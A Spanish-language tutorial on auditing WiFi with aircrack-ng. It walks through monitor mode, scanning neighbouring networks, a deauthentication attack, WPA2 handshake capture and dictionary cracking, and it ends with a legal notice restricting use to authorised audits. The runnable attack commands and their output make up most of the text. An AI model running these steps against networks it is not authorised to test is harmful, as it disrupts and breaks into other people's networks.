Aircrack-ng (Practica)

Guía para Captura de Handshake y Análisis de Seguridad en Redes WiFi

1. Requisitos Iniciales

Para comenzar, necesitaremos un adaptador de red inalámbrico compatible con modo monitor e inyección de paquetes. En este caso, utilizaremos el TP-LINK TL-WN722N versión 1. Es importante destacar que versiones superiores (v2/v3) pueden presentar problemas de compatibilidad, por lo que se recomienda utilizar exclusivamente la versión 1.

Una vez iniciado Kali Linux e insertado el adaptador, podemos verificar su presencia ejecutando el siguiente comando:

ifconfig

La salida mostrará algo similar a:

eth0: <INFO_INTERFACE>

lo: <INFO_INTERFACE>

wlan0: flags=4099<UP,BROADCAST,MULTICAST>  mtu 1500
       ether ba:c3:be:31:7d:f7  txqueuelen 1000  (Ethernet)

Notamos que la interfaz aún no está en modo monitor.


2. Activar el Modo Monitor

Instalación de herramientas

Primero, instalamos la suite necesaria para la auditoría de redes WiFi:

sudo apt install aircrack-ng

Habilitar modo monitor

Luego, activamos el modo monitor en la interfaz inalámbrica:

sudo airmon-ng start wlan0 # Donde pone "wlan0" seria donde este tu TP-Link

Info:

Found 2 processes that could cause trouble.
Kill them using 'airmon-ng check kill' before putting
the card in monitor mode, they will interfere by changing channels
and sometimes putting the interface back in managed mode

    PID Name
    645 NetworkManager
   1083 wpa_supplicant

PHY     Interface       Driver          Chipset

phy0    wlan0           rtl8xxxu        TP-Link TL-WN722N v2/v3 [Realtek RTL8188EUS]
                (monitor mode enabled)

Si aparecen advertencias relacionadas con procesos activos, como NetworkManager o wpa_supplicant, es recomendable detenerlos con:

sudo airmon-ng check kill

Repetimos el comando anterior para reactivar el modo monitor si es necesario.


3. Verificar que la Inyección Funciona

Podemos realizar una prueba rápida para comprobar que nuestro adaptador puede inyectar paquetes:

sudo aireplay-ng --test wlan0

Info:

05:19:18  Trying broadcast probe requests...
05:19:18  Injection is working!
05:19:20  Found 10 APs

05:19:20  Trying directed probe requests...
05:19:20  <BSSID> - channel: 6 - 'Congo-9390'
05:19:21  Ping (min/avg/max): 1.294ms/10.880ms/140.231ms Power: -70.00
05:19:21  30/30: 100%

05:19:21  <BSSID> - channel: 5 - 'DIGIFIBRA-7P2z_EXT'
05:19:21  Ping (min/avg/max): 3.173ms/16.181ms/46.011ms Power: -79.93
05:19:21  30/30: 100%

05:19:21  <BSSID> - channel: 6 - 'MIWIFI_kGLF'
05:19:22  Ping (min/avg/max): 2.028ms/15.667ms/54.673ms Power: -82.43
05:19:22  28/30:  93%

05:19:22  <BSSID> - channel: 6 - 'MIWIFI_test'
^C/23:  95%

Si la inyección es exitosa, el resultado incluirá respuestas de varios puntos de acceso (APs), indicando que el adaptador funciona correctamente.


4. Escaneo de Redes WiFi

Para enumerar todas las redes disponibles a nuestro alrededor:

sudo airodump-ng wlan0

Info:

CH  4 ][ Elapsed: 0 s ][ 2025-04-22 05:00                                                                                                                   
 BSSID              PWR  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID                                                                             
 <BSSID>  -80        2        0    0  11  130   WPA2 CCMP   PSK  MOVISTAR_4873
 <BSSID>  -67        2        0    0  10  270   WPA2 CCMP   PSK  <length:  0>
 <BSSID>  -66        3        0    0  10  270   WPA2 CCMP   PSK  <length:  0>
 <BSSID>  -69        1        0    0  10  270   WPA2 CCMP   PSK  Digideca
 <BSSID>  -76        4        0    0  10  270   WPA2 CCMP   PSK  Digideca
 <BSSID>  -93        2        0    0   8  195   WPA2 CCMP   PSK  MIWIFI_5G
 <BSSID>  -65        5        0    0  10  270   WPA2 CCMP   PSK  Digideca
 <BSSID>  -87        5        0    0   6   65   OPN              Salón.c,
 <BSSID>  -78        2        0    0   6  270   WPA2 CCMP   PSK  MIWIFI_5G_aHBw
 <BSSID>  -71        2        0    0   6  720   WPA2 CCMP   PSK  MIWIFI_yXzO
 <BSSID>  -73        3        0    0   6   65   OPN              Congo-9390
 01:9C:14:CO:29:R8  -60        3        0    0   10  195   WPA2 CCMP   PSK  MIWIFI_test                                                                       
 <BSSID>  -73        4        0    0   1  130   WPA2 CCMP   PSK  MOVISTAR_ABU0
 <BSSID>  -83        3        0    0   1  130   WPA2 CCMP   PSK  MiFibra-9A5C
 <BSSID>  -81        5        0    0   1  270   WPA2 CCMP   PSK  MECCUSES_7236
 <BSSID>  -93        3        1    0   1  130   WPA2 CCMP   PSK  MiFibra-9E5B
 <BSSID>  -76        3        2    0   3  260   WPA2 CCMP   PSK  DIGIFIBRA-8962
 <BSSID>  -82        2        0    0   1  130   WPA2 CCMP   PSK  MiFibra-A71A
 <BSSID>  -78        6        0    0   1  720   WPA2 CCMP   PSK  DIGIFIBRA-5GUY
 <BSSID>  -66        7        6    2   1  130   WPA2 CCMP   PSK  Livebox6-108A     
 <BSSID>  -58        9        8    3   1  195   WPA2 CCMP   PSK  Livebox6-108A     
 <BSSID>  -89        4        0    0   1  195   WPA2 CCMP   PSK  MIWIFI_4Kdc       
 <BSSID>  -65        6        0    0   1  130   WPA2 CCMP   PSK  MOVISTAR_AA50     
 <BSSID>  -55        3        0    0  11  270   WPA2 CCMP   PSK  Livebox6-108A     
 <BSSID>  -44        8        3    0  10  130   WPA2 CCMP   PSK  DIGIFIBRA-fg67                                                                    
Quitting...

Esto mostrará una lista de redes, donde identificaremos el BSSID (MAC del punto de acceso) y el canal (CH) de la red objetivo. Supongamos que seleccionamos la red MIWIFI_test, con:

  • BSSID: 01:9C:14:CO:29:R8

  • Canal: 10


5. Captura de Tráfico y Handshake

Iniciar escucha de tráfico

Ejecutamos el siguiente comando para guardar todo el tráfico de la red seleccionada en un archivo .cap:

EJEMPLO:

sudo airodump-ng -c <CH> --bssid <BSSID> -w <NAME_NEW_FILE> <INTERFACE_MONITOR>

Quedaria algo asi en mi caso:

sudo airodump-ng -c 10 --bssid 01:9C:14:CO:29:R8 -w auditoria wlan0

Info:

05:01:26  Created capture file "auditoria.cap".

 CH  6 ][ Elapsed: 3 mins ][ 2025-04-22 05:04                                                                             
 BSSID        PWR RXQ  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID                                                                         
 01:9C:14:CO:29:R8  -54 100     1525      245    0   10  195   WPA2 CCMP   PSK  MIWIFI_test     
                                                              
 BSSID              STATION            PWR    Rate    Lost   Frames  Notes  Probes                                                                                    

Veremos que esta a la escucha de cualquier conexion al Wifi o cualquier trafico de red, por lo que si nos conectamos con un dispositivo al Wifi veremos lo siguiente:

05:01:26  Created capture file "auditoria.cap".

 CH  6 ][ Elapsed: 3 mins ][ 2025-04-22 05:04                                                                            
 BSSID        PWR RXQ  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID                                                                         
 01:9C:14:CO:29:R8  -54 100     1525      245    0   10  195   WPA2 CCMP   PSK  MIWIFI_test     
                                                              
 BSSID              STATION            PWR    Rate    Lost   Frames  Notes  Probes                                                                           
 01:9C:14:CO:29:R8  C5:64:F4:1A:78:K5  -30    1e- 1    276      318  EAPOL 

En este punto, comenzaremos a visualizar clientes (STATION) conectados a esa red. Una vez detectado alguno, podremos intentar capturar el handshake.

Forzar desconexión (Deauth)

Desde otra terminal, lanzamos un ataque de desautenticación para forzar la reconexión del cliente, momento en el cual podremos capturar el handshake:

EJEMPLO:

sudo aireplay-ng -0 9 -a <BSSID> -c <STATION> <INTERFACE_MONITOR>

Nos quedaria de esta forma el comando en mi caso:

sudo aireplay-ng -0 9 -a 01:9C:14:CO:29:R8 -c C5:64:F4:1A:78:K5 wlan0

Info:

05:08:40  Waiting for beacon frame (BSSID: 01:9C:14:CO:29:R8) on channel 10
05:08:40  Sending 64 directed DeAuth (code 7). STMAC: [C5:64:F4:1A:78:K5] [ 1|47 ACKs]
05:08:41  Sending 64 directed DeAuth (code 7). STMAC: [C5:64:F4:1A:78:K5] [ 0|55 ACKs]
05:08:41  Sending 64 directed DeAuth (code 7). STMAC: [C5:64:F4:1A:78:K5] [ 1|77 ACKs]
05:08:42  Sending 64 directed DeAuth (code 7). STMAC: [C5:64:F4:1A:78:K5] [ 0|71 ACKs]
05:08:43  Sending 64 directed DeAuth (code 7). STMAC: [C5:64:F4:1A:78:K5] [ 0|53 ACKs]
05:08:43  Sending 64 directed DeAuth (code 7). STMAC: [C5:64:F4:1A:78:K5] [ 0|56 ACKs]
05:08:44  Sending 64 directed DeAuth (code 7). STMAC: [C5:64:F4:1A:78:K5] [ 0|76 ACKs]
05:08:44  Sending 64 directed DeAuth (code 7). STMAC: [C5:64:F4:1A:78:K5] [ 0|73 ACKs]
05:08:45  Sending 64 directed DeAuth (code 7). STMAC: [C5:64:F4:1A:78:K5] [ 1|62 ACKs]

Repetimos este paso hasta que en la interfaz de airodump-ng aparezca el mensaje:

05:01:26  Created capture file "auditoria.cap".

 CH  6 ][ Elapsed: 3 mins ][ 2025-04-22 05:04 ][ WPA handshake: 01:9C:14:CO:29:R8                                                                            
 BSSID        PWR RXQ  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID                                                                         
 01:9C:14:CO:29:R8  -54 100     1525      245    0   10  195   WPA2 CCMP   PSK  MIWIFI_test     
                                                              
 BSSID              STATION            PWR    Rate    Lost   Frames  Notes  Probes                                                                           
 01:9C:14:CO:29:R8  C5:64:F4:1A:78:K5  -30    1e- 1    276      318  EAPOL  

Especificamente:

WPA handshake: 01:9C:14:CO:29:R8

Esto confirma que el handshake se ha capturado correctamente.


6. Ataque de Diccionario

Con el archivo .cap en nuestro poder, procedemos a intentar descifrar la clave de la red utilizando un diccionario de contraseñas:

sudo aircrack-ng -b 01:9C:14:CO:29:R8 -w <WORDLIST> auditoria.cap

Cuando se encuentre la contraseña, se mostrará un mensaje como el siguiente:

Reading packets, please wait...
Opening auditoria.cap
Read 13707 packets.

1 potential targets

                               Aircrack-ng 1.7 

      [00:00:00] 6/7 keys tested (285.31 k/s) 

      Time left: 0 seconds                                      85.71%

                           KEY FOUND! [ robertocarlos ]


      Master Key     : D7 AF 77 96 6D 09 B8 D8 6C 8F 3F 4E A1 1E TF FR 
                       F1 HY 03 1D C6 90 64 G6 36 57 95 12 84 08 4A 59 

      Transient Key  : D4 80 66 70 92 FD 72 56 2D 15 A2 DB 05 00 18 A4 
                       8D E3 60 5F BB 2E AE 55 57 55 06 95 64 90 70 E9 
                       1E 6C 3F 5D 55 9B A3 0C 83 78 B9 B9 7E BC D3 90 
                       D2 05 21 75 E0 A4 6A 36 20 CC F9 9D 1E 00 00 00 

      EAPOL HMAC     : 17 0F A7 4C ED FG 5E 90 A7 67 BB 89 10 B8 2D 37

Con esto veremos que la contraseña seria robertocarlos del Wifi MIWIFI_test, por lo que habremos obtenido de contraseña de forma correcta.


7. Validación

Finalmente, probamos la contraseña encontrada (robertocarlos) conectándonos manualmente a la red objetivo para comprobar su validez, lo cual sera exitoso.


⚠️ Nota Legal: Esta guía tiene fines educativos y de auditoría autorizada exclusivamente. El uso no autorizado de estas técnicas en redes ajenas constituye un delito según la legislación vigente.

Last updated